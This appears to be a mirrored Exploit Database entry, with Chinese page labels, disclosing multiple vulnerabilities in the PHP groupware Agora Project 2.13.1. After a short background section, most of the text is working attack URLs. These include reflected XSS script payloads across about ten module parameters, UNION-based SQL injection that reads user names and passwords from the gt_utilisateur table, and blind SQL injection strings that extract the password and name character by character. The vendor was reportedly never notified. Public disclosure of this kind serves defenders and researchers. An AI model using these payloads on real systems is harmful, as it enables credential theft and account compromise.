agora project 2.13.1 – Multiple Vulnerabilities

• Exploit Database
• 144 阅读

• 作者： Chris Russell
  日期： 2012-06-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/19329/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64

  ################################################################### Agora Project 2.13.1 Multiple Vulnerabilities ################################################################### Release Date Bug.15-06-2012 Vendor Notification Date.Never Product. Agora project Affected versions. 2.13.1 and less Type.No Commercial Attack Vector. XSS, SQLi, BSQLi Solution Status. unpublished CVE reference. Not yet assigned Download http://www.agora-project.net/divers/download.php Demo http://www.agora-project.net/demo/ I. BACKGROUND Agora-Project is an intuitive groupware under GPL (Based on PHP/MySQL). It contains many modules: File Manager (with versioning), Calendars (with resource calendars), Task Manager, Bookmark manager, Contacts, News, Forum, Instant Messaging, etc. II. DESCRIPTION vulnerabilities are XSS, SQLi, BSQLi III.EXPLOITATION XSS 192.168.0.1/module_utilisateurs/utilisateur.php?id_utilisateur"><script>alert(&apos;xss&apos;)</script> 192.168.0.1/module_agenda/evenement.php?id_evenement="><script>alert(&apos;xss&apos;)</script> 192.168.0.1/module_contact/contact.php?id_contact="><script>alert(&apos;xss&apos;)</script> 192.168.0.1/module_contact/index.php?id_dossier="><script>alert(&apos;xss&apos;)</script> 192.168.0.1/module_tache/index.php?id_dossier="><script>alert(&apos;xss&apos;)</script> 192.168.0.1/module_agenda/index.php?printmode="><script>alert(&apos;xss&apos;)</script> 192.168.0.1/module_lien/index.php?id_dossier="><script>alert(&apos;xss&apos;)</script> 192.168.0.1/module_forum/index.php?theme="><script>alert(&apos;xss&apos;)</script> 192.168.0.1/module_fichier/index.php?id_dossier="><script>alert(&apos;xss&apos;)</script> 192.168.0.1/module_tableau_bord/index.php?tdb_periode="><script>alert(&apos;xss&apos;)</script>   SQLi To exploit minimum visit to "public" space 192.168.0.1/module_forum/index.php?theme=1&apos; and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND &apos;1&apos;=&apos;1 192.168.0.1/module_forum/index.php?theme=1&apos; and 1=2 union select pass FROM gt_utilisateur WHERE 1 AND &apos;1&apos;=&apos;1 BSQLi To exploit minimum visit to "public" space 192.168.0.1/module_tache/tache.php?id_tache=1&apos;+and+substring(@@version,1,1)=&apos;5 192.168.0.1/module_tache/tache.php?id_tache=1&apos;+and+(select+1+from+gt_utilisateur+limit+0,1)=&apos;1   192.168.0.1/module_tache/tache.php?id_tache=1&apos;+and+(select+substring(concat(1,pass),1,1)+from+gt_utilisateur+limit+0,1)=&apos;1 192.168.0.1/module_tache/tache.php?id_tache=1&apos;+and+(select+substring(concat(1,nom),1,1)+from+gt_utilisateur+limit+0,1)=&apos;1   192.168.0.1/module_tache/tache.php?id_tache=1&apos;and ascii(substring((SELECT nom from gt_utilisateur limit 0,1),1,1))>&apos;0&apos;>&apos;0 192.168.0.1/module_tache/tache.php?id_tache=1&apos;+and ascii(substring((SELECT nom from gt_utilisateur limit 0,1),1,1))=&apos;110 ...       Discovered by. Chris Russell